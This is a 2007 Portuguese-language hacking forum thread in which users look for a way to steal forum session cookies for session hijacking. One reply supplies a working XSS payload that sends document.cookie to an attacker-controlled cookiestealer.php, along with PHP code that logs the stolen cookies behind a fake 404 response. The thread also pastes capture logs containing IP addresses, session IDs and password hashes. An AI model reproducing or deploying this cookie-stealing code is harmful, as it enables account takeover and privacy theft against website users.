Sniffer em PHP / On-line

eb0x · 26 de February , 2007, 03:24:31 AM

Alguem consegue fazer ou ja tem um sniffer deste tipo?
Que peque o ID da sessão, pass_hash, member_id e tudo mais que precisa para se sequestrar um sessão?
Que me de mais ou menos um resultado igual a este:

[Sun Feb 25 12:15:12 2007] IP=217.10.38.40 SITE=necrom.ru
REFERER=http://necrom.ru/forum/index.php?showtopic=490
QUERY=CookieIp=217.10.38.40; member_id=181; pass_hash=4f284803bd0966cc24fa8683a34afc6e; session_id=2241977e0a61ae6793e0310bc1395643; topicsread=a:1:{i:490;i:1172394611;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709); .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)

A lista completa ficaria assim:

[Mon Feb 26 08:54:48 2007] IP=80.237.82.180 SITE=meo-mts.narod.ru
REFERER=http://meo-mts.narod.ru/
QUERY=nuid=130314581165790752
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[Mon Feb 26 05:46:56 2007] IP=88.210.245.203 SITE=meo-mts.narod.ru
REFERER=http://meo-mts.narod.ru/
QUERY=nuid=913608721172457735
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ka; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2

[Mon Feb 26 04:19:10 2007] IP=83.171.68.202 SITE=meo-mts.narod.ru
REFERER=http://meo-mts.narod.ru/
QUERY=language=russian; nuid=1850975921159821300
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10

[Mon Feb 26 03:49:15 2007] IP=193.26.27.210 SITE=www.nivki-lan.net.ua
REFERER=http://www.nivki-lan.net.ua/forum/viewtopic.php?t=1051
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[Mon Feb 26 03:49:06 2007] IP=193.26.27.210 SITE=www.nivki-lan.net.ua
REFERER=http://www.nivki-lan.net.ua/forum/viewtopic.php?t=1051
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

[Mon Feb 26 01:51:30 2007] IP=172.132.184.187 SITE=
REFERER=
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709); .NET CLR 1.1.4322)

[Mon Feb 26 01:02:02 2007] IP=213.253.216.24 SITE=
REFERER=
QUERY=
AGENT=Opera/9.10 (Windows NT 5.1; U; hu)

[Mon Feb 26 00:28:14 2007] IP=82.208.100.185 SITE=www.9909.biz
REFERER=http://www.9909.biz/forum/showthread.php?p=10625
QUERY=
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0

[Sun Feb 25 22:57:36 2007] IP=213.158.12.12 SITE=git.mybb.ru
REFERER=http://git.mybb.ru/viewtopic.php?id=5
QUERY=
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) Gecko/20070220 Firefox/1.5.0.9 Flock/0.7.10.2

[Sun Feb 25 21:53:30 2007] IP=83.171.68.202 SITE=meo-mts.narod.ru
REFERER=http://meo-mts.narod.ru/
QUERY=language=russian; nuid=1850975921159821300
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10

[Sun Feb 25 21:40:18 2007] IP=76.169.97.232 SITE=sla.ckers.org
REFERER=http://sla.ckers.org/forum/read.php?2,5552,5567
QUERY=SLSL
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

[Sun Feb 25 21:39:48 2007] IP=76.169.97.232 SITE=sla.ckers.org
REFERER=http://sla.ckers.org/forum/read.php?2,5552,5567
QUERY=SLSL
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Tenho certeza a comunidade vai ficar muito grata se tivermos isso em mãos e principalmente sendo da equipe. Vamos a luta ou a criação.

format pro C's

branco · 26 de February , 2007, 04:43:04 PM

vc só vai conseguir fazer isso se invadir o servidor e por um script que pegue as sessoes pra vc... no caso pra pegar esses dados vai ser possivel apenas com um sniffer de rede, ou você pode fazer com que um script em php em uma determinada maquina da rede, acesse outra maquina e pegue as sessoes dos arquivos, mas isso seria mais facil em perl, c++ etc
desafio alguem a conseguir fazer esse sniff

agora praque você quer um sniff em php ? pra se conectar nele numa lan house por exemplo ? então a resposta proque você deseja é :

o php é serve side, ou seja não tem como pegar os dados de um cliente sendo que o php está rodando no servidor...

é isso, espero ter te esclarecido, até mais

eb0x · 27 de February , 2007, 12:56:09 AM

Valeu branco. mas vc nao esclareceu, nao.
Olha sei que é possivel, tive experiencia "vendo em funcionamento". Para se pegar a sessão e outros dados vc apenas mandaria um requisição, para a pessoa apontando para um arquivo que esta sendo "monitorado" pelo sniff em php.
So queria saber se tem alguem que pode entrar nesse projeto, para criarmos um para a comunidade, pois criando esse sniff em php, apontando para um arquivo qualquer, conseguiremos ter o que queremos e alem do mais, uma ferramenta unica nossa.
Fica o desafio e esperando participantes.
Pois eu ja estou tentando, por aqui.

format pro C's

eb0x · 27 de February , 2007, 01:31:19 AM

A minha ideia é "fulano de tal" acessa uma url que eu envio a ela, seja qual for o metodo.
Tipo: www.teste.com.br/cgi-bin/default.jpg
Depois que a pessoa acessar essa imagem os dados como IDSession, ass_hash, member_id serao gravados em nosso sniffer que esta no www.teste.com.br/sniffer/sniffer.php. Nos dando os resultados como mostrados:

[quote
[Sun Feb 25 12:15:12 2007 - IP=217.10.38.40 SITE=darkers.com.br
REFERER=http://www.darkers.com.br/forum/index.php?topic=5792.0
QUERY=CookieIp=217.10.38.40; member_id=181; pass_hash=4f284803bd0966cc24fa8683a34afc6e; session_id=2241977e0a61ae6793e0310bc1395643; topicsread=a:1:{i:490;i:1172394611;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709); .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
[/quote]

Claro que os dados aqui são falsos ... rsrs
Mas sei que mesmo assim, tem gente que vai tentar usar. hahaha
Mas voltando a ideia é esta alguem sabe como transformar isso em realidade ? Como disse antes estou tentando mas estou querendo ajuda da comunidade tb.

format pro C's .....

Ahh: BRANCO, não leve a mau nao, o jeito que falei antes. É que ainda acho que nao fui bem compreendido mas agora creio que esta melhor explicado.

branco · 27 de February , 2007, 09:25:25 AM

bom eu conheço dois metodos, um é vulnerabilidade de xss no alvo, outro é o forum hospedar a imagem que você quer utilizar pra esse fim, por exemplo
você coloca esse codigo dentro de uma imagem e hospede no site alvo

Code Select

<SCRIPT>location.href='http://seusite/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>

a pagina cookiestealer no seu servidor pra onde os cookies seriam enviados teria de ter o seguinte

Code Select

<?php
  $filename = "logfile&#46;txt";
  if (isset($_GET["cookie"&#93;))
  {
    if (!$handle = fopen($filename, 'a'))
    {
      echo "HTTP 404 Not Found";
      exit;
    }
    else
    {
      if (fwrite($handle, "\r\n" &#46; $_GET["cookie"&#93;) === FALSE)
      {
        echo "HTTP 404 Not Found";
        exit;
      }
    }
    echo "HTTP 404 Not Found";
    fclose($handle);
    exit;
  }
  echo "HTTP 404 Not Found";
  exit;
?>

explicando :

o cara vai clicar em uma imagem que vai ser aberta no proprio alvo, com isso os cookies da vitima serão enviados para a pagina cookiestelar no servidor, essa pagina vai pegar os cookies e salvar no arquivo logfile.txt...

você pode encontrar mais informações sobre a tecnica em :
http://www.darkers.com.br/forum/index.php?topic=4952.0

até mais

eb0x · 28 de February , 2007, 02:20:17 AM

É exatamente isso que estava pensando porem quero agora nao mais uma imagem e sim uma outra php que quando acessada gere ou grave em uma php existente (ex.: sniffer.php) os dados do cookie. Com sessão, ID e tudo mais.
Alterando a imagem por uma pagina, tiraria a "engenharia social" pois o user abriria a pagina para ter seu cookie roubado.
Mas valeu, mesmo branco.

format pro C

eb0x · 28 de February , 2007, 02:22:19 AM

Quote from: "branco"você pode encontrar mais informações sobre a tecnica em :
http://www.darkers.com.br/forum/index.php?topic=4952.0

Tem como up de novo branco ? Ficaria grato
Valeu

format pro C